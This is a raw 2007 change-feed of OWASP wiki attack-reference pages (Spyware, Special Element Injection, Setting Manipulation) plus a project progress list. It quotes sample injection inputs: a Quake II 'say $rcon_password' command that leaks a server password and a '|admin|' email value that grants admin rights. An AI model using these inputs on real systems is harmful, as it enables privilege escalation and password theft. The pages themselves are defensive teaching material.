&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
The spyware is a program that captures statistic information from user´s computer and sends it over internet without user acceptance. This information is usually obtained from cookies and web browser’s history. The spyware can also install other software, display advertisement, or redirect the web browser activity.&lt;br /&gt;
A spyware differs from virus, worm and adware from various ways. The spyware does not self-replicate and distribute like virus and worm, and not necessarily displays advertisements like adware. The common characteristics between spyware and virus, worm, and adware are:&lt;br /&gt;
&lt;br /&gt;
1.	exploitation of infected computer for commercial purposes&lt;br /&gt;
&lt;br /&gt;
2.	the display, in some cases, of advertisements&lt;br /&gt;
&lt;br /&gt;
The spyware is usually masqueraded or presented as an utility software like P2P client, optimization tool, web accelerator, download accelerator, and even as security software like antispyware. In this case the user infects the computer by installing this kind of software without being aware of the danger. The spyware can also be bundled in media and shareware, being additionally installed with the software or autorun. The infection can occurs through fake Windows warning, when the fake message appears warning the user about some security issue or offering performance optimizing.&lt;br /&gt;
The computer infected presents symptoms like poor performance due to high memory and processor usage, unwanted behavior, system crash, high internet bandwidth usage, large number of popup, and many other symptoms.&lt;br /&gt;
The biggest problem is that the infected computer becomes extremely vulnerable to many other spywares, which install themselves into the computer.&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High &lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
Very High&lt;br /&gt;
&lt;br /&gt;
==Example ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/images/6/68/Figura2.jpg&lt;br /&gt;
&lt;br /&gt;
Figure 1. A lot of toolbars added by spyware, and some working as spyware&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
&lt;br /&gt;
*http://cwe.mitre.org/data/definitions/506.html -  Malicious&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
*[[:Category:Client-side Attacks]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
* [[Trojan Horse]]&lt;br /&gt;
* [[Phishing]]&lt;br /&gt;
* [[:Category:Malicious Code Attack]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
TBD&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
TBD&lt;br /&gt;
&lt;br /&gt;
[[Category:Resource Manipulation]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Special_Element_Injection&amp;diff=23089</id>
		<title>Special Element Injection</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Special_Element_Injection&amp;diff=23089"/>
				<updated>2007-11-05T17:32:58Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
Special Element Injection is a type of injection attack that exploits weakness related to reserved words and special character.&lt;br /&gt;
&lt;br /&gt;
Every programming language and operational system has special characters considered as reserved words for it. However, when an application receives such data as user input, it is possible to observe unexpected behavior in the application when parsing this information. This can lead to information disclosure, access control and authorization bypass, code injection, and many other variants.&lt;br /&gt;
&lt;br /&gt;
According to the characters used, the Special Element Injection attack can be performed using macro symbol, parameter delimiter and null character/null byte, among others. &lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
Medium to High&lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
Medium &lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
=== Example 1 - Macro symbol ===&lt;br /&gt;
&lt;br /&gt;
The Special Element Injection attack based on macro symbol can be performed by inserting macro symbols in input fields or user configuration files. A known example of this attack can be represented by vulnerability exploitation on Quake II server 3.20 and 3.21. This vulnerability allows remote user to access server console variables (cvar), directory lists and execute admin commands by client on the Quake II Server. &lt;br /&gt;
&lt;br /&gt;
On this application, cvars are used by client and server to store configurations and status information. A cvar can be accessed by “$name” syntax, where “name” is the name of the console variable to be expanded. &lt;br /&gt;
&lt;br /&gt;
However, it is possible to modify the client console to send a malicious command to the server, such as “say $rcon_password” to attempt discovering the content server $rcon_password variables.&lt;br /&gt;
&lt;br /&gt;
By discovering the password, it is possible to perform further actions on the server, like discover directories structures, command execution and visualization of files contents.&lt;br /&gt;
&lt;br /&gt;
=== Example 2 - Parameter delimiter ===&lt;br /&gt;
&lt;br /&gt;
Parameter Delimiter is another variant of Special Element Injection. In order to illustrate how this attack can be performed, it’ll be used a vulnerability found on PHP posting system Poster version.two.  &lt;br /&gt;
&lt;br /&gt;
This application has a dangerous vulnerability that allows data insertion into fields (username, password, email address and privileges) of the “mem.php” file. This file is responsible for managing application users.&lt;br /&gt;
&lt;br /&gt;
An example of “mem.php” file is shown bellow, where user Jose has admin privileges and Alice has just user access:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;?&lt;br /&gt;
 Jose|12345678|jose@attack.com|admin|&lt;br /&gt;
 Alice|87654321|alice@attack.com|normal|&lt;br /&gt;
 ?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When a user wants to edit his profile, he must use edit account” option in the “index.php” page and enter his login information. However, using “|” as a parameter delimiter on email field followed by “admin” profile, the user could elevate her privileges to administrator. Example:&lt;br /&gt;
&lt;br /&gt;
 Username: Alice&lt;br /&gt;
 Password: 87654321&lt;br /&gt;
 Email: alice@attack.com |admin| &lt;br /&gt;
&lt;br /&gt;
This information will be recorded in “mem.php” file like this: &lt;br /&gt;
&lt;br /&gt;
 Alice|87654321|alice@attack.com|admin|normal|&lt;br /&gt;
&lt;br /&gt;
The next time user Alice logs in, the application will acquire the parameter “|admin|” as user profile, thus elevating her privileges to administrator profile.&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
&lt;br /&gt;
http://cwe.mitre.org/data/definitions/75.html - Special Element Injection (75)&lt;br /&gt;
&lt;br /&gt;
http://cwe.mitre.org/data/definitions/76.html - Equivalent Special Element Injection (76)&lt;br /&gt;
&lt;br /&gt;
http://cwe.mitre.org/data/definitions/141.html - Parameter Delimiter(141)&lt;br /&gt;
&lt;br /&gt;
http://cve.mitre.org/docs/plover/SECTION.9.3.html - PLOVER: SECTION.9.3. – Special Elements (Characters or Reserved Words)&lt;br /&gt;
&lt;br /&gt;
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0770 - Quake II Server Vulnerability&lt;br /&gt;
&lt;br /&gt;
http://www.kb.cert.org/vuls/id/970915 - Quake II Server performs console variable expansion on client-supplied input values&lt;br /&gt;
&lt;br /&gt;
http://archives.neohapsis.com/archives/bugtraq/2002-05/0118.html - Quaker II Server problem&lt;br /&gt;
&lt;br /&gt;
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0307 - Attacker inserts field separator into input to specify admin privileges&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[:Category: Command Execution]]&lt;br /&gt;
&lt;br /&gt;
[[:Category: Authorization]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
[[:Category:Injection Attack]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
[[:Category: Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
[[:Category: Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Injection]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Setting_Manipulation&amp;diff=23088</id>
		<title>Setting Manipulation</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Setting_Manipulation&amp;diff=23088"/>
				<updated>2007-11-05T17:26:26Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
This attack aims to modify application settings in order to cause data misleading or advantages on user behalf. He may manipulate values in the system and manages specific resources user by application or affects its functionalities.&lt;br /&gt;
&lt;br /&gt;
An attacker can exploit several functionalities of the application using this attack technique, but it would not possible to describe all the ways of exploration, due to innumerable options that attacker may use to control the system values.   &lt;br /&gt;
&lt;br /&gt;
Using this attack technique, it is possible to manipulate settings by changing the application functions, such as calls to the database, blocking access to external libraries and/or modification log files.&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
Medium to Low&lt;br /&gt;
&lt;br /&gt;
==Example==&lt;br /&gt;
&lt;br /&gt;
===Example 1 ===&lt;br /&gt;
&lt;br /&gt;
An attacker needs to identify the variables without input validation or improperly encapsulated to obtain success in the attack.&lt;br /&gt;
&lt;br /&gt;
The following example was based on the ones found in the Individual CWE Dictionary Definition (Setting Manipulation-15). &lt;br /&gt;
&lt;br /&gt;
Consider the following piece of Java code:&lt;br /&gt;
  …&lt;br /&gt;
  conn.setCatalog(request.getParameter(“catalog”));&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
This fragment reads the string “catalog” from “HttpServletRequest” and sets it as the active catalog for a database connection. An attacker could manipulate this information and cause connection error or unauthorized access to other catalogs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Example 2 – Block Access to Libraries ===&lt;br /&gt;
&lt;br /&gt;
The attacker has the privileges to block application access to external libraries to execute this attack. It is necessary discover what external libraries are accessed by application and block it. The attacker needs to observe if behavior of the system goes into an insecure/inconsistent state.&lt;br /&gt;
&lt;br /&gt;
In this case the application uses a third party cryptographic random number generation library that used in generation of user session ids. An attacker may block to access this library by renaming it.&lt;br /&gt;
Then an application will be use the weak pseudo random number generation library. The attacker can use this weakness to predict the session id user, he/she attempts to perform elevation of privilege escalation and gains access user’s account. &lt;br /&gt;
&lt;br /&gt;
For more details about this attack, see:&lt;br /&gt;
http://capec.mitre.org/data/definitions/96.html&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
&lt;br /&gt;
http://cwe.mitre.org/data/definitions/15.html - Setting Manipulation&lt;br /&gt;
&lt;br /&gt;
http://capec.mitre.org/data/definitions/13.html - Subverting Environment Variable Values&lt;br /&gt;
&lt;br /&gt;
http://capec.mitre.org/data/definitions/96.html - Block Access to Libraries&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[:Category: Logical Attacks]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
*[[Denial of Service]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
* [[:Category:Input General Logic Error Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
*[[:Category: Error Handling]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category: Resource Manipulation]]&lt;br /&gt;
&lt;br /&gt;
[[Category: Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&amp;diff=23087</id>
		<title>SpoC 007 - Attacks Reference Guide - Progress Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&amp;diff=23087"/>
				<updated>2007-11-05T17:25:30Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: /* Work Done */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.owasp.org/index.php/SpoC_007_-_Attacks_Reference_Guide Back to Attacks Reference Guide Main Page] &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/index.php/SpoC_007_-_Refresh_Attacks_list Back to Refresh Attacks List Main Page]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The Attack reference guide is being developed by [[SpoC_007_-_Attacks_Reference_Guide |NSRAV Security R&amp;amp;D]] and [[SpoC_007_-_Refresh_Attacks_list |Przemyslaw 'Rezos' Skowron]]. In order to avoid work superposition, the project was divided in 3 phases comprising the following activities:&lt;br /&gt;
&lt;br /&gt;
# Attack list revision and description (75% of the project)&lt;br /&gt;
# Attacks categorization (40% of the project)&lt;br /&gt;
# Research and describe new attacks (80% of the project)&lt;br /&gt;
&lt;br /&gt;
Total project status: '''90% Done!'''&lt;br /&gt;
&lt;br /&gt;
== CheckPoints and Decision ==&lt;br /&gt;
&lt;br /&gt;
===Phase 1 - 90% Done ===&lt;br /&gt;
* Attack List Revision: '''Done!'''&lt;br /&gt;
Total number of items on the Attack Guide: '''91'''!&lt;br /&gt;
&lt;br /&gt;
We noticed that Attack reference guide was previously defined based on [http://cwe.mitre.org/ CWE - Common Weakness Enumeration], which defines global software weakness and threats. In order to develop the Attack reference guide focused on Web application attacks, we reviewed the list and marked some items to be removed from the list. The contents of generic or redundant items were used in descriptions of some items and marked to be removed too.&lt;br /&gt;
&lt;br /&gt;
Items considered to removal from the attack list: '''30 items''', as follows:&lt;br /&gt;
&lt;br /&gt;
**[[API_Abuse]]&lt;br /&gt;
**[[Cross_Site_Scripting]]&lt;br /&gt;
**[[Cross-Site_Scripting]]&lt;br /&gt;
**[[CSRF]]&lt;br /&gt;
**[[Internal_software_developer]]&lt;br /&gt;
**[[Interpreter_Injection]]&lt;br /&gt;
**[[Link_Following]]&lt;br /&gt;
**[[Log_forging]]&lt;br /&gt;
**[[Logic/time_bomb]]&lt;br /&gt;
**[[Macro_symbol]]&lt;br /&gt;
**[[Network_amplification]]&lt;br /&gt;
**[[One-Click_Attack]]&lt;br /&gt;
**[[OS_Injection]]&lt;br /&gt;
**[[OS_Command_Injection]]&lt;br /&gt;
**[[PRNG_permanent_compromise_attack]]&lt;br /&gt;
**[[Reviewing_Code_for_OS_Injection]]&lt;br /&gt;
**[[Script_in_IMG_tags]]&lt;br /&gt;
**[[Sniffing_application_traffic_attack]]&lt;br /&gt;
**[[Template:Attack]]&lt;br /&gt;
**[[Unquoted_Search_Path_or_Element]]&lt;br /&gt;
**[[Web_problems]]&lt;br /&gt;
**[[Wildcard_or_Matching_Element]]&lt;br /&gt;
**[[Windows_::DATA_alternate_data_stream]]&lt;br /&gt;
**[[Windows_hard_link]]&lt;br /&gt;
**[[Windows_MS-DOS_device_names]]&lt;br /&gt;
**[[Windows_Path_Link_problems]]&lt;br /&gt;
**[[Windows_Shortcut_Following_%28.LNK%29]]&lt;br /&gt;
**[[Windows_Virtual_File_problems]]&lt;br /&gt;
**[[XSS_Attacks]]&lt;br /&gt;
**[[XSRF]]&lt;br /&gt;
&lt;br /&gt;
* Attacks Description: '''48 of 59 items done'''!&lt;br /&gt;
* Attacks and content just reviewed '''2 items'''!&lt;br /&gt;
**[[HTTP_Response_Splitting]]&lt;br /&gt;
**[[SQL_Injection]]&lt;br /&gt;
&lt;br /&gt;
===Phase 2 - DONE! ===&lt;br /&gt;
The attacks categorization was based on [http://capec.mitre.org Common Attack Pattern Enumeration and Classification - CAPEC], since it is maintained by a respected entity and wide enough to fit all web application attacks. &lt;br /&gt;
&lt;br /&gt;
The categories defined are:&lt;br /&gt;
* [[:Category:Abuse of Functionality]]&lt;br /&gt;
* [[:Category:Spoofing]]&lt;br /&gt;
* [[:Category:Probabilistic Techniques]]&lt;br /&gt;
* [[:Category:Exploitation of Authentication]]&lt;br /&gt;
* [[:Category:Resource Depletion]]&lt;br /&gt;
* Exploitation of Privilege/Trust&lt;br /&gt;
* [[:Category:Injection]] (Injecting Control Plane content through the Data Plane)&lt;br /&gt;
* [[:Category:Data_Structure_Attacks]]&lt;br /&gt;
* Data Leakage Attacks&lt;br /&gt;
* [[:Category:Resource Manipulation]]&lt;br /&gt;
* Protocol Manipulation&lt;br /&gt;
* Time and State Attacks&lt;br /&gt;
&lt;br /&gt;
It was also defined the threats categorization based on [http://wasc.ptsecurity.ru/wasc/index.php?title=TCv2 WASC Threat Classification v2], under development.&lt;br /&gt;
&lt;br /&gt;
===Phase 3 ===&lt;br /&gt;
Research and Description of new attacks(under revision):&lt;br /&gt;
&lt;br /&gt;
** Block Access to Libraries - add as a example of [[Setting_Manipulation]]&lt;br /&gt;
** [[Buffer_Overflow_via_Environment_Variables]]&lt;br /&gt;
** [[Cross_Frame_Scripting]]&lt;br /&gt;
** [[Denial_of_Service]] - The DoS items previously described were extracted from [[Testing_for_Denial_of_Service]] section of [[OWASP_Testing_Guide]].&lt;br /&gt;
** [[Embedding_Null_Code]]&lt;br /&gt;
** [[Man-in-the-browser_attack]]&lt;br /&gt;
** [[Manipulating_User_Permission_Identifier]]&lt;br /&gt;
** [[Overflow_Binary_Resource_File]]&lt;br /&gt;
** [[Session_Prediction]]&lt;br /&gt;
&lt;br /&gt;
=== Work Done ===&lt;br /&gt;
Note: this links were inserted here by Dinis Cruz from OWASP-NSRAV.zip file&lt;br /&gt;
&lt;br /&gt;
Note2: Other items inserted and sorted by name by Leonardo Cavallari (NSRAV).&lt;br /&gt;
&lt;br /&gt;
* [[Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29]] - ([http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&amp;amp;diff=23056&amp;amp;oldid=6053 diff] , [http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Direct_Static_Code_Injection]] - ([http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&amp;amp;diff=23057&amp;amp;oldid=5711 diff] , [http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Double_Encoding]] - ([http://www.owasp.org/index.php?title=Double_Encoding&amp;amp;diff=23058&amp;amp;oldid=5740 diff] , [http://www.owasp.org/index.php?title=Double_Encoding&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Forced_browsing]] - ([http://www.owasp.org/index.php?title=Forced_browsing&amp;amp;diff=23060&amp;amp;oldid=19889 diff] , [http://www.owasp.org/index.php?title=Forced_browsing&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Format_string_attack]] - ([http://www.owasp.org/index.php?title=Format_string_attack&amp;amp;diff=23065&amp;amp;oldid=7393 diff] , [http://www.owasp.org/index.php?title=Format_string_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[LDAP_injection]] - ([http://www.owasp.org/index.php?title=LDAP_injection&amp;amp;diff=23067&amp;amp;oldid=10830 diff] , [http://www.owasp.org/index.php?title=LDAP_injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Man-in-the-middle_attack]] - ([http://www.owasp.org/index.php?title=Man-in-the-middle_attack&amp;amp;diff=23075&amp;amp;oldid=18290 diff] , [http://www.owasp.org/index.php?title=Man-in-the-middle_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_invoking_untrusted_mobile_code]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_invoking_untrusted_mobile_code&amp;amp;diff=23077&amp;amp;oldid=6035 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_invoking_untrusted_mobile_code&amp;amp;action=history history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_non-final_public_field]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_non-final_public_field&amp;amp;diff=23079&amp;amp;oldid=6036 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_non-final_public_field&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_object_hijack]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_object_hijack&amp;amp;diff=23082&amp;amp;oldid=6040 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_object_hijack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Parameter_Delimiter]] - ([http://www.owasp.org/index.php?title=Parameter_Delimiter&amp;amp;diff=23084&amp;amp;oldid=6190 diff] , [http://www.owasp.org/index.php?title=Parameter_Delimiter&amp;amp;action=history history])&lt;br /&gt;
	&lt;br /&gt;
* [[Path_Manipulation]] - ([http://www.owasp.org/index.php?title=Path_Manipulation&amp;amp;diff=22073&amp;amp;oldid=7983 diff] , [http://www.owasp.org/index.php?title=Path_Manipulation&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Path_Traversal]] - ([http://www.owasp.org/index.php?title=Path_Traversal&amp;amp;diff=20667&amp;amp;oldid=18282 diff] , [http://www.owasp.org/index.php?title=Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Relative_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Relative_Path_Traversal&amp;amp;diff=20873&amp;amp;oldid=6423 diff] , [http://www.owasp.org/index.php?title=Relative_Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Repudiation_Attack]] - ([http://www.owasp.org/index.php?title=Repudiation_Attack&amp;amp;diff=22728&amp;amp;oldid=7397 diff] , [http://www.owasp.org/index.php?title=Repudiation_Attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Resource_Injection]] - ([http://www.owasp.org/index.php?title=Resource_Injection&amp;amp;diff=20794&amp;amp;oldid=7980 diff] , [http://www.owasp.org/index.php/Resource_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Server-Side_Includes_%28SSI%29_Injection]] - ([http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&amp;amp;diff=20886&amp;amp;oldid=18278 diff] , [http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Session_hijacking_attack]] - ([http://www.owasp.org/index.php?title=Session_hijacking_attack&amp;amp;diff=22733&amp;amp;oldid=6467 diff] , [http://www.owasp.org/index.php?title=Session_hijacking_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Setting_Manipulation]] - ([http://www.owasp.org/index.php?title=Setting_Manipulation&amp;amp;diff=22734&amp;amp;oldid=7984 diff] , [http://www.owasp.org/index.php?title=Setting_Manipulation&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Special_Element_Injection]] - ([http://www.owasp.org/index.php?title=Special_Element_Injection&amp;amp;diff=20884&amp;amp;oldid=6447 diff] , [http://www.owasp.org/index.php?title=Special_Element_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Spyware]] - ([http://www.owasp.org/index.php?title=Spyware&amp;amp;diff=22761&amp;amp;oldid=6448 diff] , [http://www.owasp.org/index.php?title=Spyware&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Traffic_flood]] - ([http://www.owasp.org/index.php?title=Traffic_flood&amp;amp;diff=22775&amp;amp;oldid=7392 diff] , [https://www.owasp.org/index.php?title=Traffic_flood&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Trojan_Horse]] - ([http://www.owasp.org/index.php?title=Trojan_Horse&amp;amp;diff=22756&amp;amp;oldid=7078 diff] , [http://www.owasp.org/index.php?title=Trojan_Horse&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Unicode_Encoding]] - ([http://www.owasp.org/index.php?title=Unicode_Encoding&amp;amp;diff=22729&amp;amp;oldid=7943 diff] , [http://www.owasp.org/index.php?title=Unicode_Encoding&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Web_Parameter_Tampering]] - ([http://www.owasp.org/index.php?title=Web_Parameter_Tampering&amp;amp;diff=20883&amp;amp;oldid=6831 diff] , [http://www.owasp.org/index.php?title=Web_Parameter_Tampering&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
by Przemyslaw 'rezos' Skowron (20071025 - part I - first 50%])&lt;br /&gt;
&lt;br /&gt;
* [[Absolute_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Absolute_Path_Traversal&amp;amp;diff=22637&amp;amp;oldid=14001 diff] , [http://www.owasp.org/index.php?title=Absolute_Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Argument_Injection_or_Modification]] - ([http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;amp;diff=22638&amp;amp;oldid=5186 diff] , [http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Brute_force_attack]] - ([http://www.owasp.org/index.php?title=Brute_force_attack&amp;amp;diff=22641&amp;amp;oldid=13966 diff] , [http://www.owasp.org/index.php?title=Brute_force_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Buffer_overflow_attack]] - ([http://www.owasp.org/index.php?title=Buffer_overflow_attack&amp;amp;diff=22642&amp;amp;oldid=7390 diff] , [http://www.owasp.org/index.php?title=Buffer_overflow_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cache_Poisoning]] - ([http://www.owasp.org/index.php?title=Cache_Poisoning&amp;amp;diff=22647&amp;amp;oldid=13172 diff] , [http://www.owasp.org/index.php?title=Cache_Poisoning&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Code_Injection]] - ([http://www.owasp.org/index.php?title=Code_Injection&amp;amp;diff=22651&amp;amp;oldid=7913 diff] , [http://www.owasp.org/index.php?title=Code_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Command_Injection]] - ([http://www.owasp.org/index.php?title=Command_Injection&amp;amp;diff=22654&amp;amp;oldid=16438 diff] , [http://www.owasp.org/index.php?title=Command_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-Site_Request_Forgery]] - ([http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&amp;amp;diff=22643&amp;amp;oldid=19627 diff] , [http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-User_Defacement]] - ([http://www.owasp.org/index.php?title=Cross-User_Defacement&amp;amp;diff=22658&amp;amp;oldid=7949 diff] , [http://www.owasp.org/index.php?title=Cross-User_Defacement&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-site-scripting]] - ([http://www.owasp.org/index.php?title=Cross-site-scripting&amp;amp;diff=22660&amp;amp;oldid=21443 diff] , [http://www.owasp.org/index.php?title=Cross-site-scripting&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Integer_Overflows/Underflows]] - ([http://www.owasp.org/index.php?title=Integer_Overflows%2FUnderflows&amp;amp;diff=22661&amp;amp;oldid=7380 diff] , [http://www.owasp.org/index.php?title=Integer_Overflows/Underflows&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[XSS_in_error_pages]] - ([http://www.owasp.org/index.php?title=XSS_in_error_pages&amp;amp;diff=22662&amp;amp;oldid=6850 diff] , [http://www.owasp.org/index.php?title=XSS_in_error_pages&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
by Przemyslaw 'rezos' Skowron (20071104 - part II - second 50%])&lt;br /&gt;
&lt;br /&gt;
* [[Account_lockout_attack]] - ([http://www.owasp.org/index.php?title=Account_lockout_attack&amp;amp;diff=22954&amp;amp;oldid=6117 diff] , [http://www.owasp.org/index.php?title=Account_lockout_attack&amp;amp;action=history history])&lt;br /&gt;
* [[Alternate_XSS_Syntax]] - ([http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&amp;amp;diff=22956&amp;amp;oldid=16480 diff], [http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&amp;amp;action=history history])&lt;br /&gt;
* [[Asymmetric_resource_consumption_%28amplification%29]] - ([http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&amp;amp;diff=22957&amp;amp;oldid=5188 diff], [http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&amp;amp;action=history history])&lt;br /&gt;
* [[Blind_SQL_Injection]] - ([http://www.owasp.org/index.php?title=Blind_SQL_Injection&amp;amp;diff=22959&amp;amp;oldid=14497 diff], [http://www.owasp.org/index.php?title=Blind_SQL_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[Blind_XPath_Injection]] - ([http://www.owasp.org/index.php?title=Blind_XPath_Injection&amp;amp;diff=22960&amp;amp;oldid=9579 diff], [http://www.owasp.org/index.php?title=Blind_XPath_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[Comment_Element]] - ([http://www.owasp.org/index.php?title=Comment_Element&amp;amp;diff=22961&amp;amp;oldid=5325 diff], [http://www.owasp.org/index.php?title=Comment_Element&amp;amp;action=history history])&lt;br /&gt;
